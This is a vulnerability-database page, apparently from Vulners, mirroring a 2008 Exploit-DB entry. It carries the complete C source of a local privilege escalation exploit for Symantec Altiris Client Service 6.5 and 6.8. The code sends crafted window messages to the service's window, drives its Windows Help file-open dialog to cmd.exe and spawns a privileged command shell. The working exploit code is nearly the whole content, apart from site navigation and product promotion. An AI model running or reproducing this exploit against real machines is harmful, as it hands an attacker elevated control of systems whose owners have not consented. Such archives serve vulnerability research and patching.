Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Symantec Altiris Client Service 6.8.378 - Local Privilege Escalation

🗓️ 15 May 2008 00:00:00Reported by Alex HernandezType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 23 Views

Symantec Altiris Client Service 6.8.378 - Local Privilege Escalation 0day exploit by sirdarckcat & alt3k

Code
// 0day PRIVATE NOT DISTRIBUTE!!!
//
// Symantec Altiris Client Service Local Exploit (0day) 
//
// Affected Versions	: Altiris Client 6.5.248
//			  Altiris Client 6.5.299
//			  Altiris client 6.8.378
//
// Alex Hernandez aka alt3kx 
// ahernandez [at] sybsecurity.com
//
// Eduardo Vela aka sirdarckcat 
// sirdarckcat [at] gmail.com
//
// We'll see you soon at ph-neutral 0x7d8

#include "stdio.h"
#include "windows.h"

int main(int argc, char* argv[])
{
 HWND lHandle, lHandle2;
 POINT point;
 int id,a=0;
 char langH[255][255];
 char langO[255][255];
 char wname[]="Altiris Client Service";
 
 strcpy(langH[0x0c],"Aide de Windows");
 strcpy(langH[0x09],"Windows Help");
 strcpy(langH[0x0a],"Ayuda de Windows");
 
 strcpy(langO[0x0c],"Ouvrir");
 strcpy(langO[0x09],"Open");
 strcpy(langO[0x0a],"Abrir");
 
 printf("##########################################################\n");
 printf("#                  Altiris Client Service                #\n");
 printf("# WM_COMMANDHELP Windows Privilege Escalation Exploit    #\n");
 printf("# by sirdarckcat & alt3kx                                #\n");
 printf("#                                                        #\n");
 printf("# This exploit is based on www.milw0rm.com/exploits/350  #\n");
 printf("# Utility Manager Privilege Elevation Exploit (MS04-019) #\n");
 printf("# by Cesar Cerrudo                                       #\n");
 printf("##########################################################\n\n");
  
 id=PRIMARYLANGID(GetSystemDefaultLangID());
 if (id==0 && (id=PRIMARYLANGID(GetUserDefaultLangID()))){
    printf("Lang not found, using english\n");
    id=9;
 }

 char sText[]="%windir%\\system32\\cmd.ex?";

 if (argc<2){
    printf("Use:\n> %s [LANG-ID]\n\n",argv[0]);
    printf("Look for your LANG-ID here:\n");
    printf("http://msdn2.microsoft.com/en-us/library/ms776294.aspx\n");
    printf("\nAnyway, the program will try to guess it.\n\n");
    return 0;
 }else{
    if (argc==2){
       if (langH[atoi(argv[1])]){
          id=atoi(argv[1]);
          printf("Lang changed\n");
       }else{
          printf("Lang not supported\n",id);
       }
    }
 }
 printf("Using Lang %d\n",id);
 printf("Looking for %s..\n",wname);
 lHandle=FindWindow(NULL, wname);   
 if (!lHandle) {
  printf("Window %s not found\n", wname);
  return 0;
 }else{
  printf("Found! exploiting..\n");
 }
 PostMessage(lHandle,0x313,NULL,NULL);
 
 Sleep(100);

 SendMessage(lHandle,0x365,NULL,0x1);
 Sleep(300);
 pp:
 if (!FindWindow(NULL, langH[id])){
    printf("Help Window not found.. exploit unsuccesful\n");
    if (id!=9){
       printf("Trying with english..\n");
       id=9;
       goto pp;
    }else{
          return 0;
    } 
 }else{
    printf("Help Window found! exploiting..\n");
 } 
 SendMessage (FindWindow(NULL, langH[id]), WM_IME_KEYDOWN, VK_RETURN, 0);
 Sleep(500);
 lHandle = FindWindow("#32770",langO[id]);
 lHandle2 = GetDlgItem(lHandle, 0x47C);
 Sleep(500);
 printf("Sending path..\n");
 SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
 Sleep(800);
 SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);
 lHandle2 = GetDlgItem(lHandle, 0x4A0);
 printf("Looking for cmd..\n"); 
 SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
 Sleep(500);
 lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
 lHandle2 = GetDlgItem(lHandle2, 0x1);
 printf("Sending keys..\n");
 SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0);
 SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0);
 SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0);
 Sleep(500);
 mark:
 PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
 Sleep(1000);
 point.x =10; point.y =30;
 lHandle2=WindowFromPoint(point);
  Sleep(1000);
 printf("Opening shell..\n");
 SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);
  Sleep(1000);
 SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0);
  Sleep(1000);
 SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0);
  Sleep(1000);
 if (!FindWindow(NULL,"C:\\WINDOWS\\system32\\cmd.exe") && !FindWindow(NULL,"C:\\WINNT\\system32\\cmd.exe")){
    printf("Failed\n");
    if (!a){
        a++;
        goto mark;
    }
 }else{
       printf("Done!\n");
 }
 if(!a){
    SendMessage (lHandle, WM_CLOSE,0,0);
    Sleep(500);
    SendMessage (FindWindow(NULL, langH[id]), WM_CLOSE, 0, 0);
    SendMessage (FindWindow(NULL, argv[1]), WM_CLOSE, 0, 0);
 }else{
    printf("The exploit failed, but maybe the context window of the shell is visibile.\n");
 }
 return 0;
}

// milw0rm.com [2008-05-15]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
15 May 2008 00:00Current
7.4High risk
Vulners AI Score7.4
symantec altiris client servicelocal privilege escalation0dayexploitsirdarckcatalt3kx
23